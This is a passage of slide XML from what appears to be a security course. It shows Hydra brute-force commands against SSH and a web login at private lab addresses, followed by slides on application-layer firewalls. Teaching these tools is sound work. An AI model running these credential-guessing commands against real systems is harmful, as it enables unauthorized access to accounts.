              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157246CB-1EC7-0566-AA03-DC8BEA6AF4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5488366" y="1944426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ZIP files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC905DE-A79A-2914-26EA-DB9E8197AB42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556861" y="2226460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unzip archive.zip   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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0E241E-93BC-73B4-9328-4EF5E28792CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2585067" y="2445786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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869AC9BF-243D-ED3B-2C3C-BC2C20BD3B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3984622" y="2288974"/>
            <a:ext cx="3113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Unzip files </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC11E4A5-AA32-4D84-5433-1D24DC226127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556861" y="2611376"/>
            <a:ext cx="505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hydra -l root -P rockyou.txt  ssh://192.168.1.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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13243B7A-AE46-7465-9611-012236781E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6852810" y="2643936"/>
            <a:ext cx="300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Attack on SSH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E0F4208-624C-C4CD-F968-ECCF938AA216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479813" y="279668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51A8A8-88E6-1A79-43BD-45D886A7905A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358604" y="322214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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E484AAA-7643-21F5-364D-2BD943A402C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541993" y="3041784"/>
            <a:ext cx="385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-hydra -L users.txt -P passwords.txt 192.168.1.10 ssh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77FBBCF-D932-7D5D-91C6-3F5FFD08B76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5776738" y="3058516"/>
            <a:ext cx="364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Using a list of users and passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C593831F-EA90-1551-F040-A93823455DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578622" y="3603464"/>
            <a:ext cx="437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-hydra -l admin -P passwords.txt 192.168.1.20 http …..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08010F-7764-43CC-0087-962EF54B97F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4264974" y="378382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Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F368965F-C7E1-BC92-56B4-56EAADE5736A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5731275" y="3649888"/>
            <a:ext cx="36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Guess on a web login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203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9E995F7-947F-F9C5-57D4-E64B3B87E60E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E27CE10-BD88-8976-584C-F17B06B39A41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Application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Layer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Firewalls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1A715B0-1CF6-E6A7-EE4D-4A3562CEC1A2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DA955D5-FAE5-689F-FC06-C4B1F284A013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110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090F5B2-4D5E-C039-77D2-8BE26CBC07F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1266763"/>
            <a:ext cx="7675880" cy="324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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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level</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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work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checking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all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OSI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7</a:t>
            </a:r>
            <a:endParaRPr sz="2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layers.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Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="4953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They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provide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more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comprehensive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protection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because they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inspect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actual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content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packet,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just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its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headers.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example:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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Drop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any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peer-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>to-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peer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application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packet.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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Prevent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users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visiting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site.</a:t>
            </a:r>
            <a:endParaRPr sz="24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111352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EB5FE86-2FF1-F4B7-FB37-16593E1A0971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Application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Layer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Firewalls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374B5D5-43D6-1418-7256-45BB73960092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1336664"/>
            <a:ext cx="79362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Level</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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7</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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indeed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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able</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>understand</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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most</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>application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r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>nowadays.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Organizations</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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them</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>to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protect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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their</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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filter</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>traffic.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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B8CBAF2E-2F0E-EAAF-8127-4752073B95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7994" y="2472805"/>
            <a:ext cx="1758188" cy="1223772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0F44A8-AEDA-928F-9D6F-212AF9E1949B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="856348" y="3543162"/>
            <a:ext cx="3189580" cy="1363560"/>
            <a:chOff x="734593" y="3542284"/>
            <a:chExt cx="3189580" cy="1363560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE5406A-5F04-D873-9846-38161C0F16D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593" y="3542284"/>
              <a:ext cx="1131163" cy="1363560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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CBD62056-EC22-7272-26E6-37ADF7B349A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879473" y="3832225"/>
              <a:ext cx="2044700" cy="398145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="385610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="398119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007713" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957577" y="92125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957197" y="96138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961768" y="101498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965705" y="101841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2044191" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="1947926" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1944369" y="1650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941829" y="8255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943480" y="11937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946782" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007290" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951227" y="1143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194792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3D7353A5-6B88-EB5C-08E0-A546E6496090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7985087" y="4162452"/>
            <a:ext cx="520700" cy="520700"/>
            <a:chOff x="7863332" y="4161574"/>
            <a:chExt cx="520700" cy="520700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id="{502A2262-4560-1C24-EAA2-1B37937F67F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7863332" y="4161574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394462" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="260350" y="134086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126238" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134112" y="260311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="394398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126238" y="520623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="386537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394462" y="520623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520700" y="394398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386588" y="260311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520700" y="126225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394462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84AD1257-38B8-DA93-884A-E6902DD2B17C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7863332" y="4161574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0" y="126225"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126238" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="134086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394462" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520700" y="126225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386588" y="260311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520700" y="394398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394462" y="520623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="386537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126238" y="520623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="394398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134112" y="260311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126225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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563E8F83-1880-A258-7597-053A6608AADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4178464" y="2529320"/>
            <a:ext cx="4258997" cy="2086610"/>
            <a:chOff x="4056709" y="2528442"/>
            <a:chExt cx="4258997" cy="2086610"/>
          </a:xfrm>
        </p:grpSpPr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6A3B4B98-A1F3-7D96-1231-9F63BE31844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6709" y="3049845"/>
              <a:ext cx="878274" cy="1248481"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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317A9C9F-47E7-1069-FC34-6593680A908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9812" y="3113092"/>
              <a:ext cx="734553" cy="1168353"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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BF958F69-9D82-496B-8166-581E57935C46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4063093" y="3032911"/>
              <a:ext cx="899794" cy="1288415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="771882" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="134454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1231706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130215" y="1288224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317793" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139075" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129273" y="1253487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134344" y="1252578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60246" y="1220419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1220419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23912" y="1204649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1204649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="165818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20044" y="165818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="148907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117130" y="148907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768776" y="35400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764537" y="33863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865350" y="33863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771882" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="134344" y="1252578"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129273" y="1253487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139075" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134344" y="1252578"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="865258" y="1121691"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134344" y="1252578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139075" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317793" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899496" y="1150459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="1136072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1136072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1121691"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="23912" y="1204649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1220419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1209130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23912" y="1204649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="34237" y="1209130"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1220419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60246" y="1220419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1209130"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="34237" y="1204649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="23912" y="1204649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1209130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="1204649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="879409" y="1119157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1121691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1136072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879409" y="1119157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="899495" y="1119157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="879409" y="1119157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1136072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="1136072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="1119157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="865258" y="70368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="865258" y="1121691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879409" y="1119157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="1119157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="74474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876587" y="74474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="70368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="34237" y="148907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20044" y="165818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="163346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="148907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="34237" y="163346"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20044" y="165818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="165818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="163346"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="117130" y="148907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34237" y="148907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34237" y="163346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117130" y="148907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="865258" y="58313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="865258" y="70368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876587" y="74474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865258" y="58313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="899795" h="1288414">
                  <a:moveTo>
                    <a:pt x="899495" y="58313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="865258" y="58313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876587" y="74474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899495" y="74474"/>
